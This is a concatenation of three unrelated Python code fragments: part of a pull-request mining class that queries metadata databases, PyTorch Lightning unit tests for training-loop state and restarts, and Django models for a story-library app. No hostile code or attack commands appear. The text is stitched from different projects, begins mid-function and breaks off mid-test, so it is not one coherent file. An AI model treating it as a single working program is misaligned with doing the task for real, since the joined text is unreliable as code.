return dfs, facts, unreleased_prs_event
@classmethod
@sentry_span
async def mine(cls,
date_from: date,
date_to: date,
time_from: datetime,
time_to: datetime,
repositories: Set[str],
participants: PRParticipants,
labels: LabelFilter,
jira: JIRAFilter,
with_jira_map: bool,
branches: pd.DataFrame,
default_branches: Dict[str, str],
exclude_inactive: bool,
release_settings: ReleaseSettings,
logical_settings: LogicalRepositorySettings,
prefixer: Prefixer,
account: int,
meta_ids: Tuple[int, ...],
mdb: Database,
pdb: Database,
rdb: Database,
cache: Optional[aiomcache.Client],
updated_min: Optional[datetime] = None,
updated_max: Optional[datetime] = None,
pr_blacklist: Optional[Tuple[Collection[int], Dict[str, List[int]]]] = None,
truncate: bool = True,
) -> Tuple["PullRequestMiner",
PullRequestFactsMap,
Dict[str, ReleaseMatch],
asyncio.Event]:
"""
Mine metadata about pull requests according to the numerous filters.
:param account: State DB account ID.
:param meta_ids: Metadata (GitHub) account IDs.
:param date_from: Fetch PRs created starting from this date, inclusive.
:param date_to: Fetch PRs created ending with this date, inclusive.
:param time_from: Precise timestamp of since when PR events are allowed to happen.
:param time_to: Precise timestamp of until when PR events are allowed to happen.
:param repositories: PRs must belong to these repositories (prefix excluded).
:param participants: PRs must have these user IDs in the specified participation roles \
(OR aggregation). An empty dict means everybody.
:param labels: PRs must be labeled according to this filter's include & exclude sets.
:param jira: JIRA filters for those PRs that are matched with JIRA issues.
:param with_jira_map: Value indicating whether we must load JIRA issues mapped to PRs. \
This is independent from filtering PRs by `jira`.
:param branches: Preloaded DataFrame with branches in the specified repositories.
:param default_branches: Mapping from repository names to their default branch names.
:param exclude_inactive: Ors must have at least one event in the given time frame.
:param release_settings: Release match settings of the account.
:param logical_settings: Logical repository settings of the account.
:param updated_min: PRs must have the last update timestamp not older than it.
:param updated_max: PRs must have the last update timestamp not newer than or equal to it.
:param mdb: Metadata db instance.
:param pdb: Precomputed db instance.
:param rdb: Persistentdata db instance.
:param cache: memcached client to cache the collected data.
:param pr_blacklist: completely ignore the existence of these PR node IDs. \
The second tuple element is the ambiguous PRs: released by branch \
while there were no tag releases and the strategy is `tag_or_branch`.
:param truncate: activate the "time machine" and erase everything after `time_to`.
:return: 1. New `PullRequestMiner` with the PRs satisfying to the specified filters. \
2. Precomputed facts about unreleased pull requests. \
This is an optimization which breaks the abstraction a bit. \
3. `matched_bys` - release matches for each repository. \
4. Synchronization for updating the pdb table with merged unreleased PRs. \
Another abstraction leakage that we have to deal with.
"""
date_from_with_time = datetime.combine(date_from, datetime.min.time(), tzinfo=timezone.utc)
date_to_with_time = datetime.combine(date_to, datetime.min.time(), tzinfo=timezone.utc)
assert time_from >= date_from_with_time
assert time_to <= date_to_with_time
dfs, facts, _, _, _, _, _, matched_bys, event = await cls._mine(
date_from, date_to, repositories, participants, labels, jira, with_jira_map, branches,
default_branches, exclude_inactive, release_settings, logical_settings,
updated_min, updated_max, pr_blacklist, truncate, prefixer, account, meta_ids,
mdb, pdb, rdb, cache)
cls._truncate_prs(dfs, time_from, time_to)
return cls(dfs), facts, matched_bys, event
@classmethod
@sentry_span
async def fetch_prs(cls,
time_from: Optional[datetime],
time_to: datetime,
repositories: Union[Set[str], KeysView[str]],
participants: PRParticipants,
labels: LabelFilter,
jira: JIRAFilter,
exclude_inactive: bool,
pr_blacklist: Optional[BinaryExpression],
pr_whitelist: Optional[BinaryExpression],
branches: pd.DataFrame,
dags: Optional[Dict[str, DAG]],
account: int,
meta_ids: Tuple[int, ...],
mdb: Database,
pdb: Database,
cache: Optional[aiomcache.Client],
columns=PullRequest,
updated_min: Optional[datetime] = None,
updated_max: Optional[datetime] = None,
fetch_branch_dags_task: Optional[asyncio.Task] = None,
with_labels: bool = False,
) -> Tuple[pd.DataFrame, Dict[str, DAG], Optional[pd.DataFrame]]:
"""
Query pull requests from mdb that satisfy the given filters.
Note: we cannot filter by regular PR labels here due to the DB schema limitations,
so the caller is responsible for fetching PR labels and filtering by them afterward.
Besides, we cannot filter by participation roles different from AUTHOR and MERGER.
Note: we cannot load PRs that closed before time_from but released between
`time_from` and `time_to`. Hence the caller should map_releases_to_prs separately.
There can be duplicates: PR closed between `time_from` and `time_to` and released
between `time_from` and `time_to`.
Note: we cannot load PRs that closed before time_from but deployed between
`time_from` and `time_to`. Hence the caller should map_deployments_to_prs separately.
There can be duplicates: PR closed between `time_from` and `time_to` and deployed
between `time_from` and `time_to`.
We have to resolve the merge commits of rebased PRs so that they do not appear
force-push-dropped.
:return: pandas DataFrame with the PRs indexed by node_id; \
commit DAGs that contain the branch heads; \
(if was required) DataFrame with PR labels.
"""
assert isinstance(mdb, Database)
assert isinstance(pdb, Database)
pr_list_coro = cls._fetch_prs_by_filters(
time_from, time_to, repositories, participants, labels, jira, exclude_inactive,
pr_blacklist, pr_whitelist, meta_ids, mdb, cache, columns=columns,
updated_min=updated_min, updated_max=updated_max,
)
if columns is not PullRequest and PullRequest.merge_commit_id not in columns and \
PullRequest.merge_commit_sha not in columns:
prs, labels = await pr_list_coro
return prs, dags, labels if with_labels else None
if fetch_branch_dags_task is None:
fetch_branch_dags_task = cls._fetch_branch_dags(
repositories, dags, branches, account, meta_ids, mdb, pdb, cache)
dags, (prs, labels) = await gather(fetch_branch_dags_task, pr_list_coro)
async def load_labels():
if not with_labels:
return None
if labels is not None:
return labels
return await fetch_labels_to_filter(prs.index.values, meta_ids, mdb)
prs, labels = await gather(
cls.mark_dead_prs(prs, branches, dags, meta_ids, mdb, columns),
load_labels(),
)
return prs, dags, labels
@classmethod
async def mark_dead_prs(cls,
prs: pd.DataFrame,
branches: pd.DataFrame,
dags: Dict[str, DAG],
meta_ids: Tuple[int, ...],
mdb: Database,
columns=PullRequest,
) -> pd.DataFrame:
"""
Add and fill "dead" column in the `prs` DataFrame.
A PR is considered dead (force-push-dropped) if it does not exit in the commit DAG and \
we cannot detect its rebased clone.
"""
prs["dead"] = False
if branches.empty:
return prs
merged_prs = prs.take(np.nonzero((
prs[PullRequest.merged_at.name] <= datetime.now(timezone.utc) - timedelta(hours=1)
).values)[0])
# timedelta(hours=1) must match the `exptime` of `fetch_repository_commits()`
# commits DAGs are cached and may be not fully up to date, so otherwise some PRs may
# appear as wrongly force push dropped; see also: DEV-554
if merged_prs.empty:
return prs
pr_numbers = merged_prs[PullRequest.number.name].values
assert merged_prs.index.nlevels == 1
pr_node_ids = merged_prs.index.values
pr_repos = merged_prs[PullRequest.repository_full_name.name].values
repo_order = np.argsort(pr_repos)
unique_pr_repos, pr_repo_counts = np.unique(pr_repos, return_counts=True)
pr_merge_hashes = \
merged_prs[PullRequest.merge_commit_sha.name].values.astype("S40")[repo_order]
pos = 0
queries = []
dead = []
acc_id_cond = PushCommit.acc_id.in_(meta_ids)
min_commit_date = merged_prs[PullRequest.merged_at.name].min()
committed_date_cond = PushCommit.committed_date >= min_commit_date
substr = sql.func.substr(PushCommit.message, 1, 32)
sqlite = mdb.url.dialect == "sqlite"
for repo, n_prs in zip(unique_pr_repos, pr_repo_counts):
begin_pos = pos
end_pos = pos + n_prs
pos += n_prs
repo_pr_merge_hashes = pr_merge_hashes[begin_pos:end_pos]
dag_hashes = dags[repo][0]
if len(dag_hashes) == 0:
# no branches found in `fetch_repository_commits()`
continue
not_found = dag_hashes[
searchsorted_inrange(dag_hashes, repo_pr_merge_hashes)
] != repo_pr_merge_hashes
indexes = repo_order[begin_pos:end_pos][not_found]
dead.extend(dead_node_ids := pr_node_ids[indexes])
repo_cond = PushCommit.repository_full_name == repo
for pr_node_id, n in zip(dead_node_ids, pr_numbers[indexes]):
if sqlite:
# SQLite does not support parameter recycling
acc_id_cond = PushCommit.acc_id.in_(meta_ids)
committed_date_cond = PushCommit.committed_date >= min_commit_date
substr = sql.func.substr(PushCommit.message, 1, 32)
repo_cond = PushCommit.repository_full_name == repo
queries.append(
sql.select([PushCommit.node_id.label("commit_node_id"),
PushCommit.sha.label("sha"),
sql.literal_column("'" + repo + "'").label("repo"),
sql.literal_column(str(pr_node_id)).label("pr_node_id"),
PushCommit.committed_date,
PushCommit.pushed_date])
.where(sql.and_(acc_id_cond,
repo_cond,
committed_date_cond,
substr.like("Merge pull request #%d from %%" % n))))
if not queries:
return prs
prs.loc[dead, "dead"] = True
# we may have MANY queries here and Postgres responds with StatementTooComplexError
# split them by 100-sized batches to stay below the resource limits
batch_size = 100
tasks = []
for batch_index in range(0, len(queries), batch_size):
batch = queries[batch_index:batch_index + batch_size]
if len(batch) == 1:
query = batch[0]
else:
query = sql.union_all(*batch)
tasks.append(read_sql_query(query, mdb, [
"commit_node_id", "sha", "repo", "pr_node_id",
PushCommit.committed_date, PushCommit.pushed_date,
]))
resolveds = await gather(*tasks, op="mark_dead_prs commit SQL UNION ALL-s")
resolved = pd.concat(resolveds)
# look up the candidates in the DAGs
pr_repos = resolved["repo"].values
repo_order = np.argsort(pr_repos)
unique_pr_repos, pr_repo_counts = np.unique(pr_repos, return_counts=True)
pr_merge_hashes = resolved["sha"].values.astype("S")[repo_order]
pos = 0
alive_indexes = []
for repo, n_prs in zip(unique_pr_repos, pr_repo_counts):
begin_pos = pos
end_pos = pos + n_prs
pos += n_prs
repo_pr_merge_hashes = pr_merge_hashes[begin_pos:end_pos]
dag_hashes = dags[repo][0]
found = dag_hashes[
searchsorted_inrange(dag_hashes, repo_pr_merge_hashes)
] == repo_pr_merge_hashes
alive_indexes.extend(repo_order[begin_pos:end_pos][found])
if (resolved := resolved.take(alive_indexes)).empty:
return prs
# take the commit that was committed the latest; if | |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from copy import deepcopy
from dataclasses import dataclass
from typing import Any, Dict, Iterator
from unittest import mock
from unittest.mock import ANY
import pytest
import torch
from torch.utils.data import DataLoader
from pl_examples.bug_report_model import RandomDataset
from pytorch_lightning import LightningModule, Trainer
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.loops import Loop, TrainingBatchLoop
from pytorch_lightning.trainer.progress import BaseProgress
from tests.helpers import BoringModel
from tests.helpers.runif import RunIf
class NestedLoop(Loop):
def __init__(self):
super().__init__()
self.child_loop0 = None
self.child_loop1 = None
@property
def done(self) -> bool:
return False
def connect(self, child0, child1):
self.child_loop0 = child0
self.child_loop1 = child1
def reset(self) -> None:
pass
def advance(self, *args, **kwargs):
pass
@pytest.mark.parametrize("loop_name", ["fit_loop", "validate_loop", "test_loop", "predict_loop"])
def test_connect_loops_direct(loop_name):
"""Test Trainer referenes in loops on assignment."""
loop = NestedLoop()
with pytest.raises(RuntimeError, match="The loop is not attached to a Trainer"):
_ = loop.trainer
trainer = Trainer()
# trainer.loop = loop
setattr(trainer, loop_name, loop)
assert loop.trainer is trainer
def test_connect_loops_recursive():
"""Test Trainer references in a nested loop assigned to a Trainer."""
main_loop = NestedLoop()
child0 = NestedLoop()
child1 = NestedLoop()
main_loop.connect(child0, child1)
with pytest.raises(RuntimeError, match="The loop is not attached to a Trainer"):
_ = main_loop.trainer
with pytest.raises(RuntimeError, match="The loop is not attached to a Trainer"):
_ = main_loop.child_loop0.trainer
trainer = Trainer()
trainer.fit_loop = main_loop
assert child0.trainer is trainer
assert child1.trainer is trainer
def test_connect_subloops(tmpdir):
"""Test connecting individual subloops by calling `trainer.x.y.connect()`"""
model = BoringModel()
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True)
epoch_loop = trainer.fit_loop.epoch_loop
new_batch_loop = TrainingBatchLoop()
epoch_loop.connect(batch_loop=new_batch_loop)
assert epoch_loop.batch_loop is new_batch_loop
with pytest.raises(RuntimeError, match="The loop is not attached to a Trainer"):
_ = new_batch_loop.trainer
trainer.fit(model)
assert new_batch_loop.trainer is trainer
class CustomException(Exception):
pass
def test_loop_restore():
class Simple(Loop):
def __init__(self, dataset: Iterator):
super().__init__()
self.iteration_count = 0
self.dataset = dataset
@property
def skip(self) -> bool:
return False
@property
def done(self) -> bool:
return self.iteration_count > len(self.dataset)
def reset(self) -> None:
self.iter_dataset = iter(self.dataset)
if self.restarting:
for _ in range(self.iteration_count):
next(self.iter_dataset)
self.iteration_count += 1
else:
self.outputs = []
def advance(self) -> None:
value = next(self.iter_dataset)
if self.iteration_count == 5:
raise CustomException
self.outputs.append(value)
def on_advance_end(self) -> None:
self.iteration_count += 1
def state_dict(self) -> Dict:
return {"iteration_count": self.iteration_count, "outputs": self.outputs}
def load_state_dict(self, state_dict: Dict) -> None:
self.iteration_count = state_dict["iteration_count"]
self.outputs = state_dict["outputs"]
trainer = Trainer()
data = range(10)
loop = Simple(data)
loop.trainer = trainer
try:
loop.run()
state_dict = {}
except CustomException:
state_dict = loop.state_dict()
loop = Simple(data)
loop.trainer = trainer
loop.load_state_dict(state_dict)
loop.restarting = True
loop.run()
assert not loop.restarting
assert loop.outputs == list(range(10))
def test_loop_hierarchy():
@dataclass
class SimpleProgress(BaseProgress):
increment: int = 0
class Simple(Loop):
def __init__(self, a):
super().__init__()
self.a = a
self.progress = SimpleProgress()
def advance(self, *args: Any, **kwargs: Any) -> None:
loop = getattr(self, "loop_child", None)
if not loop:
return
loop.run()
def on_advance_end(self):
self.progress.increment += 1
@property
def done(self) -> bool:
return self.progress.increment > 0
def reset(self) -> None:
...
def on_save_checkpoint(self) -> Dict:
return {"a": self.a}
def on_load_checkpoint(self, state_dict: Dict) -> None:
self.a = state_dict["a"]
loop_parent = Simple(1)
loop_child = Simple(2)
loop_parent.loop_child = loop_child
# check the trainer reference is propagated
loop_parent.trainer = Trainer()
assert loop_child.trainer is loop_parent.trainer
state_dict = loop_parent.state_dict()
assert state_dict == {
"state_dict": {"a": 1},
"progress": {"increment": 0},
"loop_child.state_dict": {"a": 2},
"loop_child.progress": {"increment": 0},
}
state_dict["loop_child.state_dict"]["a"] = 3
# check restarting after `load_state_dict`
loop_parent.load_state_dict(state_dict)
assert loop_parent.restarting
loop_parent.run()
# check the new state after `run`
state_dict = loop_parent.state_dict()
assert state_dict == {
"state_dict": {"a": 1},
"progress": {"increment": 1},
"loop_child.state_dict": {"a": 3},
"loop_child.progress": {"increment": 1},
}
loop_parent_copy = deepcopy(loop_parent)
assert loop_parent_copy.state_dict() == loop_parent.state_dict()
assert loop_parent_copy.on_save_checkpoint() == state_dict["state_dict"]
assert loop_parent_copy.loop_child.on_save_checkpoint() == state_dict["loop_child.state_dict"]
loop_parent = Simple(1)
loop_child = Simple(2)
loop_parent.loop_child = loop_child
loop_parent.load_state_dict(state_dict)
assert loop_parent.progress.increment == 1
assert loop_parent.loop_child.progress.increment == 1
del loop_parent.loop_child
state_dict = loop_parent.state_dict()
assert state_dict == {"state_dict": {"a": 1}, "progress": {"increment": 1}}
@RunIf(min_torch="1.7.0")
@mock.patch.dict(os.environ, {"PL_FAULT_TOLERANT_TRAINING": "1"})
@pytest.mark.parametrize("stop_epoch", (1, 2))
@pytest.mark.parametrize("stop_batch", (1, 2))
@pytest.mark.parametrize("n_dataloaders,stop_dataloader", [(2, 0), (2, 1), (3, 2)])
def test_loop_restart_progress_multiple_dataloaders(tmpdir, n_dataloaders, stop_dataloader, stop_epoch, stop_batch):
n_batches = 5
n_epochs = 3
class ValidationModel(BoringModel):
def __init__(self):
super().__init__()
def validation_step(self, batch, batch_idx, dataloader_idx):
if self.current_epoch == stop_epoch and batch_idx == stop_batch and dataloader_idx == stop_dataloader:
raise CustomException
return super().validation_step(batch, batch_idx)
def val_dataloader(self):
return [super(ValidationModel, self).val_dataloader() for _ in range(n_dataloaders)]
model = ValidationModel()
model.validation_epoch_end = None
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=n_epochs,
limit_train_batches=1,
limit_val_batches=n_batches,
num_sanity_val_steps=0,
)
# simulate a failure
with pytest.raises(CustomException):
trainer.fit(model)
ckpt_path = str(tmpdir / ".pl_auto_save.ckpt")
checkpoint = torch.load(ckpt_path)["loops"]["fit_loop"]
total_dataloader = stop_epoch * n_dataloaders + stop_dataloader
expected = {
"total": {"ready": total_dataloader + 1, "completed": total_dataloader},
"current": {"ready": stop_dataloader + 1, "completed": stop_dataloader},
}
assert checkpoint["epoch_loop.val_loop.dataloader_progress"] == expected
trainer.fit_loop.load_state_dict(checkpoint)
# `nbe_`: non-breaking epoch, as in, no exception will be raised. `be_`: breaking epoch
nbe_total_val_batch = stop_epoch * n_dataloaders * n_batches
be_total_val_batch = stop_dataloader * n_batches + stop_batch
total_val_batch = nbe_total_val_batch + be_total_val_batch
expected = {
"total": {
"ready": total_val_batch + 1,
"started": total_val_batch + 1,
"processed": total_val_batch,
"completed": total_val_batch,
},
"current": {
"ready": stop_batch + 1,
"started": stop_batch + 1,
"processed": stop_batch,
"completed": stop_batch,
},
"is_last_batch": False,
}
assert trainer.fit_loop.epoch_loop.val_loop.epoch_loop.batch_progress.state_dict() == expected
@RunIf(min_torch="1.7.0")
@mock.patch.dict(os.environ, {"PL_FAULT_TOLERANT_TRAINING": "1"})
@pytest.mark.parametrize("accumulate_grad_batches", (1, 2, 3))
@pytest.mark.parametrize("n_optimizers", (1, 3, 5))
@pytest.mark.parametrize("stop_epoch", (1, 2))
@pytest.mark.parametrize("stop_batch", (1, 2))
@pytest.mark.parametrize("stop_optimizer", (1, 2))
def test_loop_state_on_exception(accumulate_grad_batches, stop_epoch, stop_batch, stop_optimizer, n_optimizers, tmpdir):
stop_optimizer = stop_optimizer if stop_optimizer < n_optimizers else 0
n_epochs = 3
n_batches = 3
class TestModel(BoringModel):
def __init__(self):
super().__init__()
if n_optimizers > 1:
self.configure_optimizers = self.configure_optimizers_multiple
def training_step(self, batch, batch_idx, optimizer_idx=0):
if self.trainer.current_epoch == stop_epoch and batch_idx == stop_batch and optimizer_idx == stop_optimizer:
raise CustomException
return super().training_step(batch, batch_idx)
def configure_optimizers_multiple(self):
optimizers = [torch.optim.Adam(self.layer.parameters(), lr=0.1) for _ in range(n_optimizers)]
lr_scheduler_0 = torch.optim.lr_scheduler.StepLR(optimizers[0], step_size=1)
lr_scheduler_1 = torch.optim.lr_scheduler.StepLR(optimizers[1], step_size=1)
# no scheduler for optimizer_2
lr_schedulers = [lr_scheduler_0, {"scheduler": lr_scheduler_1, "interval": "step"}]
return optimizers, lr_schedulers
model = TestModel()
model.training_epoch_end = None
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=n_epochs,
limit_train_batches=n_batches,
limit_val_batches=0,
accumulate_grad_batches=accumulate_grad_batches,
enable_progress_bar=False,
logger=False,
enable_checkpointing=False,
)
# simulate a failure
with pytest.raises(CustomException):
trainer.fit(model)
ckpt_path = str(tmpdir / ".pl_auto_save.ckpt")
assert os.path.exists(ckpt_path)
checkpoint = torch.load(ckpt_path)
optim_progress = trainer.fit_loop.epoch_loop.batch_loop.optimizer_loop.optim_progress
sch_progress = trainer.fit_loop.epoch_loop.scheduler_progress
# `nbe_`: non-breaking epoch, as in, no exception will be raised. `be_`: breaking epoch
nbe_batches_completed = stop_epoch * n_batches
be_batches_completed = stop_batch
be_batches_ready = stop_batch + 1
# lightning applies leftover accumulated gradients when the epoch ends
has_leftover_accumulation_batches = n_batches % accumulate_grad_batches != 0
# number of batches that will call `optimizer.step()` during non-breaking and breaking epochs
nbe_stepping_batches = nbe_batches_completed // accumulate_grad_batches
be_stepping_batches = be_batches_completed // accumulate_grad_batches
nbe_total_opt_steps = (nbe_stepping_batches + has_leftover_accumulation_batches) * n_optimizers
does_last_be_batch_step = be_batches_ready % accumulate_grad_batches == 0 or has_leftover_accumulation_batches
be_total_opt_steps = be_stepping_batches * n_optimizers + does_last_be_batch_step * stop_optimizer
assert optim_progress.optimizer_steps == nbe_total_opt_steps + be_total_opt_steps
assert optim_progress.optimizer.step.current.completed == be_total_opt_steps
has_opt_stepped_in_be = stop_batch + 1 >= accumulate_grad_batches
nbe_total_zero_grad = (nbe_stepping_batches + has_leftover_accumulation_batches) * n_optimizers
does_last_be_batch_zero_grad = be_batches_completed % accumulate_grad_batches == 0
# `max` because the first batch always zero-grads
be_total_zero_grad = max(1, be_stepping_batches) * n_optimizers + stop_optimizer * does_last_be_batch_zero_grad
assert optim_progress.optimizer.zero_grad.total.completed == nbe_total_zero_grad + be_total_zero_grad
assert optim_progress.optimizer.zero_grad.current.completed == be_total_zero_grad
nbe_sch_steps = stop_epoch
be_sch_steps = 0 # the current epoch did not complete
if n_optimizers > 1:
# assumes that the scheduler config is unchanged
# `* 1` because there is only one step-level scheduler
nbe_sch_steps = stop_epoch + nbe_stepping_batches + has_leftover_accumulation_batches * 1
# `0 +` for the epoch-level scheduler
be_sch_steps = 0 + be_stepping_batches
assert sch_progress.total.completed == nbe_sch_steps + be_sch_steps
assert sch_progress.current.completed == be_sch_steps
expected = {
"state_dict": ANY,
"epoch_progress": {
"total": {
"ready": stop_epoch + 1,
"started": stop_epoch + 1,
"processed": stop_epoch,
"completed": stop_epoch,
},
"current": {
"ready": stop_epoch + 1,
"started": stop_epoch + 1,
"processed": stop_epoch,
"completed": stop_epoch,
},
},
"epoch_loop.state_dict": ANY,
"epoch_loop.batch_progress": {
"total": {
"ready": nbe_batches_completed + be_batches_completed + 1,
"started": nbe_batches_completed + be_batches_completed + 1,
"processed": nbe_batches_completed + be_batches_completed,
"completed": nbe_batches_completed + be_batches_completed,
},
"current": {
"ready": stop_batch + 1,
"started": stop_batch + 1,
| |
<reponame>mwschall/storkive
from io import BytesIO
from django.conf import settings
from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ValidationError
from django.db import models, IntegrityError
from django.db.models import Min, Max, OuterRef, Subquery
from django.urls import reverse
from django.utils.functional import cached_property
from library.expressions import Concat, SQCount
from library.fields import CssField, ShortUUIDField
from library.managers import OrderedLowerManager
from library.mixins import AuthorsMixin, CodesMixin, DEFAULT_AUTHOR_SEP
from library.util import get_sort_name, get_author_slug, b64md5sum, inst_path, is_css_color
# TODO: Come up with a more specific name for this functionality. Or don't.
class List(models.Model):
slug = ShortUUIDField(
unique=True,
)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
related_name='lists',
on_delete=models.CASCADE,
)
name = models.CharField(
max_length=70,
)
color = CssField(
default='inherit',
)
priority = models.SmallIntegerField(
default=0,
)
auto_sort = models.BooleanField(
default=True,
)
@property
def entry_count(self):
if not hasattr(self, '_ec'):
self._ec = self.entries.count()
return self._ec
@entry_count.setter
def entry_count(self, value):
self._ec = value
def __str__(self):
return str(self.name)
class Meta:
ordering = ['-priority', 'name']
unique_together = ['user', 'name']
def clean_fields(self, exclude=None):
super().clean_fields(exclude)
if 'color' not in exclude:
if self.color and not is_css_color(self.color):
raise ValidationError({'color': ['Not a valid css color.']})
class ListEntry(models.Model):
list = models.ForeignKey(
'List',
related_name='entries',
on_delete=models.CASCADE,
)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
# ordinal = models.SmallIntegerField()
created_at = models.DateTimeField(
auto_now_add=True
)
class Meta:
unique_together = ('list', 'content_type', 'object_id')
verbose_name_plural = 'entries'
class Source(models.Model):
name = models.CharField(
max_length=150,
)
abbr = models.CharField(
max_length=15,
blank=True,
)
website = models.URLField()
def __str__(self):
return str(self.name)
class Author(models.Model):
name = models.CharField(
max_length=150,
)
slug = models.SlugField(
allow_unicode=True,
max_length=70,
unique=True,
)
email = models.EmailField(
blank=True,
)
homepage = models.URLField(
blank=True,
)
objects = OrderedLowerManager('name')
def __str__(self):
return str(self.name)
def get_absolute_url(self):
return reverse('author', args=[str(self.slug)])
def _perform_unique_checks(self, unique_checks):
errors = super()._perform_unique_checks(unique_checks)
try:
slug = self.slug or get_author_slug(self.name)
conflict = Author.objects \
.filter(slug__iexact=slug) \
.exclude(pk=self.pk) \
.values_list('name', flat=True) \
.get()
err = self.unique_error_message(Author, ('name',))
err.message = 'Existing author "%s" maps to the same slug.' % conflict
errors.setdefault('name', []).append(err)
except Author.DoesNotExist:
pass
return errors
def save(self, *args, **kwargs):
if not self.slug:
self.slug = get_author_slug(self.name)
self.full_clean()
super().save(*args, **kwargs)
class Code(models.Model):
abbr = models.CharField(
primary_key=True,
max_length=4,
)
name = models.CharField(
max_length=50,
blank=True,
)
def __str__(self):
return str(self.abbr)
class Meta:
ordering = ['abbr']
def get_absolute_url(self):
return reverse('code', args=[str(self.abbr)])
class Slant(models.Model):
abbr = models.CharField(
primary_key=True,
max_length=2,
unique=True,
verbose_name='css class',
help_text='This cannot be changed.'
)
# TODO: cast to lowercase?
description = models.CharField(
max_length=50,
)
affinity = models.ForeignKey(
'Code',
verbose_name='code affinity',
on_delete=models.PROTECT,
)
display_order = models.PositiveSmallIntegerField()
def __str__(self):
return str(self.abbr)
class Meta:
ordering = ['display_order']
def get_absolute_url(self):
return reverse('code', args=[str(self.affinity_id)])
class StoryDisplayManager(models.Manager):
def get_queryset(self):
return super().get_queryset() \
.annotate(author_dicts=Story.authors_sq(),
code_abbrs=Story.codes_sq(),
installment_count=Story.installment_count_sq(),
missing_count=Story.missing_count_sq())
class Story(models.Model, AuthorsMixin, CodesMixin):
TITLE_LEN = 150
SLUG_LEN = 70
source = models.ForeignKey(
'Source',
related_name='stories',
on_delete=models.SET_NULL,
blank=True,
null=True,
)
title = models.CharField(
max_length=TITLE_LEN,
)
sort_title = models.CharField(
max_length=TITLE_LEN,
)
slug = models.SlugField(
max_length=SLUG_LEN,
unique=True,
# allow_unicode=True,
)
authors = models.ManyToManyField(Author, related_name='stories')
published_on = models.DateField(
blank=True,
null=True,
)
updated_on = models.DateField(
blank=True,
null=True,
)
added_at = models.DateTimeField(
auto_now_add=True,
)
removed_at = models.DateTimeField(
blank=True,
null=True,
)
slant = models.ForeignKey(
'Slant',
related_name='stories',
on_delete=models.PROTECT,
blank=True,
null=True,
)
codes = models.ManyToManyField(
Code,
related_name='stories',
blank=True,
)
synopsis = models.TextField(
blank=True,
)
list_entries = GenericRelation(ListEntry, related_query_name='story')
def user_lists(self, user):
entries = self.list_entries \
.select_related('list') \
.filter(list__user=user) \
.order_by('-list__priority', 'list__name') \
.all()
return [entry.list for entry in entries]
@property
def author_list(self):
return self.authors.all()
@property
def code_list(self):
return self.codes.all()
@property
def slant_cls(self):
return self.slant_id
@property
def installment_count(self):
if not hasattr(self, '_ic'):
self._ic = self.current_installments.count()
return self._ic
@installment_count.setter
def installment_count(self, value):
self._ic = value
@property
def missing_count(self):
return 1 if not self.installment_count else self._mc
@missing_count.setter
def missing_count(self, value):
self._mc = value
@cached_property
def valid_installment_count(self):
return self.current_installments.exclude(file='').count()
@cached_property
def current_installments(self):
# return [inst for inst in self.installments.all() if inst.is_current]
return self.installments.filter(is_current=True).order_by('ordinal')
# @cached_property
# def installment_dates(self):
# return self.installments.values('ordinal').annotate(
# date_published=Min('published_on'),
# date_updated=Max('published_on'),
# )
@cached_property
def installment_dates(self):
qs = self.installments \
.values('ordinal') \
.order_by('ordinal') \
.annotate(date_published=Min('published_on'),
date_updated=Max('published_on'))
return {
d['ordinal']: {
'date_published': d['date_published'],
'date_updated': d['date_updated'],
}
for d in qs
}
@cached_property
def first_ordinal(self):
try:
return self.current_installments \
.exclude(file='') \
.order_by('ordinal') \
.values_list('ordinal', flat=True)[0]
except IndexError:
return None
@cached_property
def last_ordinal(self):
try:
return self.current_installments \
.exclude(file='') \
.order_by('-ordinal') \
.values_list('ordinal', flat=True)[0]
except IndexError:
return None
objects = models.Manager()
display_objects = StoryDisplayManager()
def __str__(self):
return str(self.title)
class Meta:
ordering = ['sort_title', 'published_on']
verbose_name_plural = 'stories'
@staticmethod
def authors_sq(separator=DEFAULT_AUTHOR_SEP):
return Subquery(Author.objects
.order_by()
.filter(stories__pk=OuterRef('pk'))
.annotate(names=Concat('name', separator=separator))
.values('names')
)
@staticmethod
def codes_sq():
return Subquery(Code.objects
.order_by()
.filter(stories__pk=OuterRef('pk'))
.annotate(abbrs=Concat('abbr'))
.values('abbrs')
)
@staticmethod
def installment_count_sq():
return SQCount(Installment.objects
.order_by()
.filter(story=OuterRef('pk'),
is_current=True)
.values('pk')
)
@staticmethod
def missing_count_sq():
return SQCount(Installment.objects
.filter(story__pk=OuterRef('pk'),
is_current=True,
file='')
.values('pk')
)
def get_absolute_url(self):
return reverse('story', args=[str(self.slug)])
def save(self, *args, **kwargs):
if not self.sort_title:
self.sort_title = get_sort_name(self.title)[:self.TITLE_LEN]
self.full_clean()
if not self.updated_on:
self.updated_on = self.published_on
super().save(*args, **kwargs)
class Installment(models.Model):
TITLE_LEN = 125
LU_WORDS = 'w'
LU_CHARS = 'c'
LU_CHOICES = (
(LU_WORDS, 'words'),
(LU_CHARS, 'chars'),
)
FMT_HTML = 'html'
FMT_MD = 'md'
FMT_RST = 'rst'
FMT_TXT = 'txt'
FMT_CHOICES = (
(FMT_HTML, 'HTML'),
(FMT_MD, 'Markdown'),
(FMT_RST, 'reStructuredText'),
(FMT_TXT, 'Plain Text'),
)
story = models.ForeignKey(
'Story',
related_name='installments',
on_delete=models.CASCADE,
)
ordinal = models.SmallIntegerField()
is_current = models.BooleanField(
default=True,
)
title = models.CharField(
max_length=TITLE_LEN,
)
authors = models.ManyToManyField(Author)
published_on = models.DateField()
added_at = models.DateTimeField(
auto_now_add=True,
)
length = models.IntegerField(
default=0,
)
length_unit = models.CharField(
max_length=1,
choices=LU_CHOICES,
default=LU_WORDS,
)
